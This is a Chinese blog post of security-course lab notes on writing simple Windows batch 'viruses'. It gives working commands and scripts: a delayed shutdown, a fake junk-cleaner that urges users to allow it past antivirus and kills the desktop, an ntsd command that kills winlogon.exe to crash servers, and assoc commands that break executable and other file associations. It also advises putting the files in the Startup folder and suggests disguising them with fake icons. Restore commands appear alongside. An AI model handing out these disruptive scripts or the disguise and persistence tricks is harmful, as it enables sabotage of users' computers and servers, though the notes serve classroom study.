病毒制作实践小记:运行关机、蓝屏炸弹、进程关闭、拓展名病毒
- 一、前言
- 二、时间过程详细小记
- 1、关机bat脚本
- 实践步骤记录:
- 2、最简单的蓝屏炸弹文件
- 3、进程关闭病毒
- 关于ntsd
- 方法一:利用进程的PID结束进程
- 方法二:利用进程名结束进程
- 4、扩展名病毒
- 解决方法:
- 拓展思考
- 三、小啊呜有话说
叮嘟!这里是小啊呜的学习课程资料整理。好记性不如烂笔头,今天也是努力进步的一天。一起加油进阶吧!
一、前言
信息安全技术实践课之计算机病毒与黑客实验中相关实践小记。
建议所有相关操作都在虚拟机中完成。希望这篇基础文章对大家有所帮助,更希望大家提高安全意识,学会相关防范,也欢迎大家讨论。
二、时间过程详细小记
1、关机bat脚本
关机bat脚本主要是调用“shutdown”
实现关机。
其基本步骤如下:
新建文本文档
输入 shutdown -s -t 600
把txt改成bat
如下图所示,运行CMD可以查看shutdown命令的基本用法。
基本命令为:
shutdown -s -t 600
//现在让系统600秒之后关机shutdown -a
//终止关闭计算机
实践步骤记录:
1、新建“test.bat”并填写“ shutdown -s -t 600”,某些系统需要在“文件夹选项”中,显示“隐藏已知文件类型的扩展名”。
把txt改成bat
2、双击BAT文件即运行关机。
运行结果如下图所示:
3、如果需要取消,还是在CMD黑框中输入“shutdown -a”命令。
2、最简单的蓝屏炸弹文件
这是一个伪装垃圾清理的批处理代码。
该命令是杀死进程:
“/im explorer.exe”
表示要杀死的进程名称,关闭桌面;
“/f”
表示强制杀死;“>nul”
表示在屏幕上不要输出任何信息。
taskkill /im explorer.exe /f >nul 2>nul
完整代码如下所示,其中“Start c:\windows\expolrer.exe”
表示继续开启桌面,“ping -n 5 127.0.0.1>nul”
用于消耗时间。
TEST.bat
@echo off
title 系统垃圾清理
color 1f
echo =====若有杀毒软件恶意拦截,请选择【允许程序的所有操作】====
echo.
echo.
echo.
echo =====垃圾清理中,请不要关闭窗口=========
echo.
ping -n 5 127.0.0.1>nul
taskkill /im explorer.exe /f >nul 2>nul
echo.
echo =====拐了,你的系统已经废了=======
echo.
ping -n 5 127.0.0.1>nul
echo.
Start c:\windows\explorer.exe
echo.
echo =====已经修复好!是不是吓坏了!!O(∩_∩)O==========
pause
运行该批处理程序,桌面会消失,如下图所示。
过一会桌面又会恢复。
这里由于桌面设置了壁纸自动切换,所以不用在意壁纸的不同。
3、进程关闭病毒
相关步骤如下:
1、新建文本文档
2、输入:ntsd -c q -pn winlogon.exe,表示强制杀死进程
3、工具->文件夹选项->查看->“隐藏已知文件类型的扩展名”勾选
4、txt修改为bat
5、开始->程序->启动,打开game.bat文件
黑客很少攻击个人,一般攻击服务器,该命令对2003的服务器特别有杀伤力
双击之后,服务器
直接蓝屏显示并重启。
关于ntsd
ntsd从Windows 2000开始就是系统自带的进程调试工具,在system32目录下。ntsd的功能非常的强大,用法也比较复杂,但如果只用来结束一些进程,那就比较简单了。
在Windows中只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的,最后那个是Win32子系统,ntsd本身需要它。lsass.exe也不要杀掉,它是负责本地账户安全的。被调试器附着的进程会随调试器一起退出,所以可以用来在命令行下终止进程。
打开cmd 后输入以下命令就可以结束进程:
方法一:利用进程的PID结束进程
命令格式:ntsd -c q -p pid命令范例:ntsd -c q -p 1332 (结束explorer.exe进程)
范例详解:explorer.exe的pid为1332,但是如何获取进程的pid呢?
在CMD下输入TASKLIST就可以获取当前任务管理器所有进程的PID。
或者打开任务管理器,在菜单栏,选择“查看”->“选择列”,在打开的选择项窗口中将“PID(进程标识符)”项选择钩上,这样任务管理器的进程中就会多出PID一项了。PID的分配并不固定,是在进程启动是由系统随机分配的,所以进程每次启动的进程一般都不会一样。
方法二:利用进程名结束进程
命令格式:ntsd -c q -pn xxxx.exe (xxxx.exe 为进程名,exe不能省)命令范例:ntsd -c q -pn explorer.exe
另外的能结束进程的DOS命令还有taskkill和tskill命令。
4、扩展名病毒
将文件格式修改或文档加密都是常见的病毒,比如永恒之蓝、勒索病毒等,它们就是将电脑内的所有资料、文档加密,当你要打开文件时,需要密码,此时通过比特币付费进行勒索。
扩展名病毒是将exe文件修改为txt文档。
当遇到可执行的exe文件,会认为它是一个txt文档,用记事本打开,导致可执行程序运行不起来,这是就是这个病毒的原理。
相关步骤如下:
1、新建文本文档
2、增加代码:assoc.exe=txtfile
3、工具->文件夹选项->查看->“隐藏已知文件类型的扩展名”勾选
4、txt修改为bat
5、开始->程序->启动,打开bat文件
6、双击运行bat文件之后,我们的可执行文件就变成了txt文件。此时系统认为exe就是txt程序,把系统的关联搞混乱了,它恢复起来很麻烦。
记得把文件放到启动菜单哦!
EXE程序打开如下图所示。
需要执行下面的命令还原exe文件。
assoc.exe=exefile
解决方法:
如果您不幸中了该病毒,怎么解决呢?如下图所示,还原所有正确关联即可。
assoc.txt=txtfile
效果如下图所示。
可怜的壁纸还是要重新设置啦!
拓展思考
其他所有文件格式都转换为txt文件,如下所示。此时,如果隐藏文件扩展名,甚至可以修改图标伪装成目标应用,当用户点击时会执行这些破坏;但由于不知道目标是否有隐藏文件扩展名,还是不建议这种“笨”方法。
assoc .htm=txtfile
assoc .dat=txtfile
assoc .com=txtfile
assoc .rar=txtfile
assoc .gho=txtfile
assoc .mvb=txtfile
...
三、小啊呜有话说
今天收获良多呀!
Ending!
更多课程知识学习记录随后再来吧!
就酱,嘎啦!
注:
1、人生在勤,不索何获。
2、病毒详解及批处理病毒制作详细文章参见:
https://blog.csdn.net/csdnnews/article/details/104322825